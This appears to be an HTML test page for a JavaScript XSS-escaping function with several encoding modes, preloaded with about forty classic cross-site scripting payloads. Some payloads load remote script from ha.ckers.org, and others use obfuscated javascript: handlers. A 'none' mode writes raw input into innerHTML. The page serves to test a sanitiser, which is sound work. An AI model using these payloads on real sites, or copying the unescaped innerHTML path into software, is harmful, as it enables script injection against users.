﻿<html>
<body>

<textarea id="testUnit"  style="display:block;width:800px;height:40em">
	'';!--"<XSS>=&{()}
	<SCRIPT src=http://ha.ckers.org/xss.js></SCRIPT>
	<IMG onerror="javascript:alert('XSS');" src="xdf">
	<IMG onerror=javascript:alert('XSS') src="xdf">
	<IMG onerror=JaVaScRiPt:alert('XSS') src="xdf">
	<IMG onerror=javascript:alert(&quot;XSS&quot;) src="xdf">
	<IMG onerror=`javascript:alert("RSnake says, 'XSS'")` src="xdf">
	<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
	<IMG onerror=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41; src="xdf">
	<IMG onerror=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041 src="xdf">
	<IMG onerror=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29 src="xdf">
	<IMG onerror="jav	ascript:alert('XSS');" src="jav	ascript:alert('XSS');">
	<IMG onerror="jav&#x09;ascript:alert('XSS');" src="jav&#x09;ascript:alert('XSS');">
	<IMG onerror="jav&#x0A;ascript:alert('XSS');" src="jav&#x0A;ascript:alert('XSS');">
	<IMG onerror="jav&#x0D;ascript:alert('XSS');" src="jav&#x0D;ascript:alert('XSS');"> 
	<IMG onerror=" &#14;  javascript:alert('XSS');" src=" &#14;  javascript:alert('XSS');">
	<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
	<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
	<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
	<<SCRIPT>alert("XSS");//<</SCRIPT>
	<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
	<SCRIPT SRC=//ha.ckers.org/.j>
	<SCRIPT>a=/XSS/
	alert(a.source)</SCRIPT>
	\";alert('XSS');//
	<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
	<BODY BACKGROUND="javascript:alert('XSS')">
	<IMG DYNSRC="javascript:alert('XSS')">
	<IMG LOWSRC="javascript:alert('XSS')">
	<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
	¼script¾alert(¢XSS¢)¼/script¾
	<DIV STYLE="background-image: url(javascript:alert('XSS'))">
	<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
	<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
	<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
	<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
	<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
</textarea>
<select id="funcUnit">
	<option value="">默认</option>
	<option value="html">html</option>
	<option value="htmlEp">htmlEp</option>
	<option value="url">url</option>
	<option value="miniUrl">miniUrl</option>
	<option value="script">script</option>
	<option value="reg">reg</option>
	<option value="none">不处理</option>
</select>
<button onclick="$log()">test</button>
<div id="result"></div>
<script>
$xss= function(str,type){
	//空过滤
	if(str == "" || str == null || typeof str == "undefined"){ return "";}
	
	switch(type){
		case "none":
			return str+"";
		break;
		case "html": //过滤html字符串中的XSS
			return str.replace(/[&'"<>\/\\\-\x00-\x09\x0b-\x0c\x1f\x80-\xff]/g, function(r){
				return "&#" + r.charCodeAt(0) + ";"
			}).replace(/ /g, "&nbsp;").replace(/\r\n/g, "<br />").replace(/\n/g,"<br />").replace(/\r/g,"<br />");
		break;
		case "htmlEp": //过滤DOM节点属性中的XSS
			return str.replace(/[&'"<>\/\\\-\x00-\x1f\x80-\xff]/g, function(r){
				return "&#" + r.charCodeAt(0) + ";"
			});
		break;
		case "url": //过滤url
			return escape(str).replace(/\+/g, "%2B");
		break;
		case "miniUrl":
			return str.replace(/%/g, "%25");
		break;
		case "script":
			return str.replace(/[\\"']/g, function(r){
				return "\\" + r;
			}).replace(/%/g, "\\x25").replace(/\n/g, "\\n").replace(/\r/g, "\\r").replace(/\x01/g, "\\x01");
		break;
		case "reg":
			return str.replace(/[\\\^\$\*\+\?\{\}\.\(\)\[\]]/g, function(a){
				return "\\" + a;
			});
		break;
		default:
			return str.replace(/[&'"<>\/\\\-\x00-\x09\x0b-\x0c\x1f\x80-\xff]/g, function(r){
				return "&#" + r.charCodeAt(0) + ";"
			}).replace(/ /g, "&nbsp;").replace(/\r\n/g, "<br />").replace(/\n/g,"<br />").replace(/\r/g,"<br />");
		break;
	}
};


//功能测试
$log = function(){
	
	var testUnit = document.getElementById("testUnit").value.split("\n");
	var funcUnit = document.getElementById("funcUnit").value;
	var buff = [];
	for(var i = 0, l = testUnit.length; i < l; i++){
		if(testUnit[i] == "" || testUnit[i] == null || typeof testUnit[i] == "undefined"){break;}
		buff.push("<li>"+$xss(testUnit[i],funcUnit)+"</li>");
	}
	document.getElementById("result").innerHTML = "<ol>"+buff.join("")+"</ol>";	
};
</script>
</body>
</html>